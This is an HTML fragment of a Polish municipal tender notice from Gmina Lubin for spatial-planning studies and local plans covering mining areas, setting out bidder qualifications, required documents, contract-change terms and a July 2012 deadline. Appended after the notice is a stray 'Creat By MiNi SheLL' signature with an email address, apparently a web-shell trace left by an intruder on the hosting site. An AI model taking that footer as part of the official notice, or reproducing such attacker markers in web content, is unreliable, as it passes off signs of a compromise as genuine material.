<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W postępowaniu nie jest wymagane wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie potwierdzające spełnianie warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek jeżeli wykaże wykonanie w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej:
- dwóch uchwalonych studiów uwarunkowań i kierunków zagospodarowania przestrzennego o powierzchni nie mniejszej niż 14 000 ha każdy, obejmujących tereny i obszary górnicze,
- czterech uchwalonych miejscowych planów zagospodarowania przestrzennego o powierzchni nie mniejszej niż 500 ha każdy, w tym 3 miejscowe plany zagospodarowania przestrzennego o powierzchni nie mniejszej niż 500 ha każdy, obejmujące tereny górnicze</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie potwierdzające spełnianie warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek jeżeli wykaże, że dysponuje odpowiednim wykwalifikowanym zespołem urbanistycznym składającym się z osób posiadających niezbędne kwalifikacje, posiadających prawo do samodzielnego projektowania przestrzeni w skali regionalnej i lokalnej stosownie do art. 5 ustawy z dnia 27 marca 2003 roku o planowaniu i zagospodarowaniu przestrzennym (Dz. U. Nr 80, poz. 717 z późn. zm.), które będą uczestniczyć w wykonywaniu zamówienia. Zespół musi składać się z:
- kierownika zespołu - głównego projektanta -urbanisty, który musi być członkiem właściwej okręgowej izby samorządu zawodowego i posiadać uprawnienia urbanistyczne oraz posiadać doświadczenie w opracowaniach urbanistycznych w zakresie sporządzania studium i miejscowych planów zagospodarowania przestrzennego minimum 10 lat,
- minimum dwóch członków zespołu - projektantów - urbanistów, którzy muszą być wpisani na listę właściwej okręgowej izby samorządu zawodowego i posiadać  uprawnienia planistyczne lub urbanistyczne i doświadczenie w opracowaniu dokumentów planistycznych minimum 5 lat</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie potwierdzające spełnianie warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 2. W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Powyższe pełnomocnictwo należy załączyć do oferty w formie oryginału lub odpisu poświadczonego notarialnie</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w zakresie i na warunkach określonych poniżej:

1. Zamawiający przewiduje możliwość zmiany umowy w zakresie wysokości wynagrodzenia:
a) ze względu na zmianę prawa podatkowego powodującą zmianę obowiązującej stawki
podatku VAT na usługi objęte umową,
b) ze względu na istotne zmiany przepisów dotyczących procedury opracowania (zmian)
studium i miejscowego planu, 
c) ze względu na rozszerzenie lub zmianę danych wyjściowych prac przez Zamawiającego.
2. Zamawiający przewiduje możliwość zmiany umowy w zakresie terminu wykonania całości prac ( lub ich części ) w przypadku:
a) złożenia uwag w trakcie wyłożenia projektu zmiany studium i projektu zmiany miejscowego planu do publicznego wglądu,
b) rozszerzenia lub zmiany danych wyjściowych prac przez Zamawiającego,
c) rozszerzenia lub zmiany danych wyjściowych prac przez instytucje uzgadniające,
d) istotnych zmian przepisów dotyczących procedury opracowania zmian studium i miejscowego planu zagospodarowania przestrzennego uniemożliwiających wykonanie umowy w terminie.
Wykonawca zobowiązany jest udokumentować wystąpienie przesłanek jak w poz. a , b, c, d  i zawiadomić Zamawiającego o okolicznościach uzasadniających zmiany jak w pkt 2 w terminie 30 dni od dnia powstania działalności uzasadniających zmiany.  
3. Zmiana przedmiotu umowy może nastąpić w zakresie dotyczącym realizacji inwestycji i nie będzie miała wpływu na zakres opracowania, opisanego w § 1 ust. 1, 2 i 3 wzoru umowy i termin realizacji zadania</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.ug-lubin.dolnyslask.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego: Urząd Gminy Lubin, ul. Władysława Łokietka 6, pok. nr 3 - Sekretariat, 59-300 Lubin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.07.2012 godzina 10:00, miejsce: w siedzibie Zamawiającego: Urząd Gminy Lubin, ul. Władysława Łokietka 6a, pok. nr 15 - Sala Konferencyjna, 59-300 Lubin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com